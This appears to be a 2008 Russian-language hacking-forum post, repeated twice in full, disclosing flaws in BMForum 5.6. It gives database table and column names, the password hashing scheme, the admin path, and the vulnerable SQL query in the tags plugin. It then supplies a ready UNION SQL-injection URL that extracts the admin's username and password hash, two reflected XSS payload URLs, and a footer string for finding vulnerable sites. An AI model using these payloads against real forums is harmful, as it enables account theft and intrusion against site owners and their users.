~!DoK_tOR!~
01.10.2008, 18:35
Офф.сайт: www.bmforum.com
Префикс таблиц бд: bmb_
Табличка: bmb_userlist
Клонки: username,pwd
Алгоритм шифрования: md5($pass)
Админка: http://localhost/admin.php
[SQL Injection]
Бага в плагине тегов.
Сценарий /plugins/tags.php
уязвимый код:
$query = "SELECT * FROM {$database_up}tags WHERE tagname='$tagname' ORDER BY 'tagid' DESC LIMIT 1";
Из кода видно то что переменная $tagname передаётся без фильтрации на основе этого мы можем провести SQL-Иньекцию.
Условие: magic_quotes_gpc = Off
Эксплойт:
http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4 +from+bmb_userlist+where+userid=1/*
[XSS Passive]
http://localhost/[installdir]/index.php?cateid='><script%20%0a%0d>alert(/xss/)%3B</script>
http://localhost/[installdir]/post.php?forumid=2&type="><script%20%0a%0d>alert(/xss/)%3B</script>
Поиск:
Powered by BMForum 2007 5.6
(c) ~!Dok_tOR!~
Префикс таблиц бд: bmb_
Табличка: bmb_userlist
Клонки: username,pwd
Алгоритм шифрования: md5($pass)
Админка: http://localhost/admin.php
[SQL Injection]
Бага в плагине тегов.
Сценарий /plugins/tags.php
уязвимый код:
$query = "SELECT * FROM {$database_up}tags WHERE tagname='$tagname' ORDER BY 'tagid' DESC LIMIT 1";
Из кода видно то что переменная $tagname передаётся без фильтрации на основе этого мы можем провести SQL-Иньекцию.
Условие: magic_quotes_gpc = Off
Эксплойт:
http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4 +from+bmb_userlist+where+userid=1/*
[XSS Passive]
http://localhost/[installdir]/index.php?cateid='><script%20%0a%0d>alert(/xss/)%3B</script>
http://localhost/[installdir]/post.php?forumid=2&type="><script%20%0a%0d>alert(/xss/)%3B</script>
Поиск:
Powered by BMForum 2007 5.6
(c) ~!Dok_tOR!~